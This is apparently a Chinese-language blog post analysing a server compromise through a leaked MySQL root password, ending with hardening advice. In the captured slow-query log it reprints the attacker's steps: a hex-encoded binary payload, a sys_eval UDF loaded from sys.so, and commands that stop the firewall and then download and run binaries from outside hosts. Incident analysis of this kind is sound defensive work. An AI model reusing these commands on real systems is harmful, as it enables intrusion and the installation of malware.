#### 現(xiàn)象
- 有很多命名奇怪的進(jìn)程(現(xiàn)場(chǎng)圖沒(méi)有保留,這個(gè)是自己模擬的):
##### 定位步驟一:查看進(jìn)程文件位置
通過(guò)命令
```
ll /proc/pid
```
查看進(jìn)程文件exe執(zhí)行路徑,打開(kāi)后整個(gè)人都驚呆了!mysql目錄和mysql/data目錄多了很多奇怪的so文件和可執(zhí)行文件:
##### 定位步驟二:立馬kill掉進(jìn)程和文件
- 批量kill進(jìn)程:介紹一個(gè)在[stackoverflow](http://stackoverflow.com/questions/3510673/find-and-kill-a-process-in-one-line-using-bash-and-regex/3510850#3510850)看到的人性化易懂的批量kill進(jìn)程的方法:
```
kill `ps -ef | grep [s]leep | awk '{print $2}'`
解釋:
- [s]正則是為了防止匹配到ps本身,免去了grep -V
- awk '{print $2}' 只輸出第二列的進(jìn)程號(hào)
- ``是執(zhí)行命令返回結(jié)果,shell語(yǔ)法
- kill grep出來(lái)的所有匹配的進(jìn)程號(hào)
```
##### 定位步驟三:修改root密碼&關(guān)閉ftp匿名用戶
正常攻擊也沒(méi)有辦法上傳木馬文件重付,初步懷疑是服務(wù)器密碼泄露,被登錄進(jìn)來(lái)凫乖,然后上傳了木馬病毒腳本文件确垫,于是通過(guò)阿里云控制臺(tái)修改了root密碼愕把,并且重啟了機(jī)器。
或者另一種可能是通過(guò)ftp上傳的森爽。此外又看了ftp匿名用戶打開(kāi)了
##### 定位步驟四:再次受到攻擊:藁怼!爬迟!
原本以為修改了root密碼并重啟了服務(wù)器問(wèn)題已經(jīng)解決橘蜜,但是過(guò)了一兩天阿里云又提示有告警,每隔幾天就爆出問(wèn)題付呕,實(shí)在是想不到原因计福,最后發(fā)現(xiàn)個(gè)現(xiàn)象木馬進(jìn)程都是mysql用戶啟動(dòng)的,mysql攻擊也不能自己?jiǎn)?dòng)進(jìn)程徽职,就算存在sql注入也沒(méi)有理由能上下載文件吧象颖。
##### 定位步驟五:捕捉現(xiàn)場(chǎng)-把mysql全日志打開(kāi)
既然問(wèn)題是出在mysql,把mysql的所有查詢?nèi)罩灸范ぃ裺low_log的時(shí)間改成0:
```
mysql -help | grep cnf
vi /etc/my.cnf
long_query_time= 0
slow_query_log=ON
slow_query_log_file=/alidata/log/mysql/slow.log
```
##### 定位步驟五:分析日志&入侵過(guò)程
觀察了一斷時(shí)間说订,看slow.log一切豁然開(kāi)朗了:
有很多奇怪的操作,包括DUMPFILE導(dǎo)出日志
```
//創(chuàng)建表
create table if not exists tempMix4(data LONGBLOB);
// 第一步設(shè)置變量
set @a = concat('',0x4D5A4B45524E454C33322E444C4C00004C6F61644C696272617279410000000047657450726F63416464726573730000557061636B42794477696E6740000000504500004C010200001000000800000000000000E0000E210B0100390050000000600000000000008D09010000100000006000000000001000100000000200000400000000000000040000000000000000800100000200000000000002000000000010000010000000001000001000000000000010000000590C0100B8000000410C01001400000000D000009003000000000000000000000000000000000000480000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002E557061636B000000C00000001000000000000000000000000000000000000000000000600000E02E7273726300000000B0000000D00000113D000000020000000000000000000000000000600000E088010010140D01101B0000000E00000000100010BB0B0110070C01100A0C0110180C0110F30B0110FC0F00102E0B0110300B0110D009011065C600103D0C0110FFBF0010220B0110000400007C070000C40B0000400100009F02000090D3001000000000FFFFFFFF0100000001000000010000000100000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058D00000380300000000000000000000380334000000560053005F00560045005200530049004F004E005F0049004E0046004F0000003400BD04EFFE00000100060002001D235600060002001D2356003F00000000000000040000000100000000000000000000000000000098020000000053007400720069006E006700460069006C00650049006E0066006F00000074020000000030003000300030003000340045003400000040002800010043006F006D006D0065006E0074007300000032003000300039002D00310032002D00310030002000310036003A00350031003A003100390000003C001C00010043006F006D00700061006E0079004E0061006D0065000000000050005000530074007200650061006D00200049006E0063002E000000500026000100460069006C0065004400650073006300720069007000740069006F006E000000000050005000530074007200650061006D00200049006E007300740061006C006C006500720000000000380018000100460069006C006500560065007200730069006F006E000000000032002E0036002E00380036002E00380039003800390000009C00760001004C006500670061006C0043006F007000790072006900670068007400000043006F0070007900720069006700680074002000280043002900200032003000300035002D0032003000300039002000500050005300740072006
//第二步 插入到臨時(shí)表
INSERT INTO tempMix VALUES (@a);
// 導(dǎo)入函數(shù)
# User@Host: root[root] @? [115.28.238.77]? Id:? ? 3
# Query_time: 0.001387? Lock_time: 0.000947 Rows_sent: 0? Rows_examined: 0
SET timestamp=1471084691;
CREATE FUNCTION sys_eval RETURNS string SONAME 'sys.so';
# User@Host: root[root] @? [115.28.238.77]? Id:? ? 3
# Query_time: 0.000213? Lock_time: 0.000113 Rows_sent: 0? Rows_examined: 0
SET timestamp=1471084691;
select sys_eval("wget http://www.zuimihu.cn/DDos;chmod 777 DDos;./DDos;");
# Time: 160831? 3:51:28
# User@Host: root[root] @? [121.42.195.49]? Id:? 115
# Query_time: 2.444778? Lock_time: 0.000000 Rows_sent: 1? Rows_examined: 0
SET timestamp=1472586688;
select sys_eval("/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://211.127.220.60:809/TSmmm;chmod 777 TSmmm;./TSmmm;");
```
##### 定位步驟六:入侵原因分析
通過(guò)代碼層面入侵的可能性非常低潮瓶,唯一的可能性是mysql的root賬號(hào)密碼被泄露或者被破解導(dǎo)致的陶冷,且從slow-log看訪問(wèn)ip就不是本機(jī),可以推斷出是遠(yuǎn)程登錄上mysql然后進(jìn)行攻擊毯辅。
##### 定位步驟七:防范措施
核心賬號(hào)密碼一定要足夠的復(fù)雜埂伦,保密,定期更換思恐,最好限制IP登錄沾谜,只允許本機(jī)登錄,再開(kāi)放其他低權(quán)限的賬戶胀莹。
修改密碼和權(quán)限后一周內(nèi)也沒(méi)有出現(xiàn)過(guò)問(wèn)題基跑。
#### 相關(guān)學(xué)習(xí)
- [MySQL慢日志查詢?nèi)馕觯簭膮?shù)、配置到分析工具](http://mp.weixin.qq.com/s?__biz=MzI4NTA1MDEwNg==&mid=2650756876&idx=1&sn=d6c91752f05cfa0a3c55b4b3b433733a&chksm=f3f9e299c48e6b8f12f91018ce14a0e15acbffe8ce09f4c62a82661acd29abdce94723c13fc0&mpshare=1&scene=1&srcid=0929TCKiJ86ZAlthrUPVOs4s#rd)
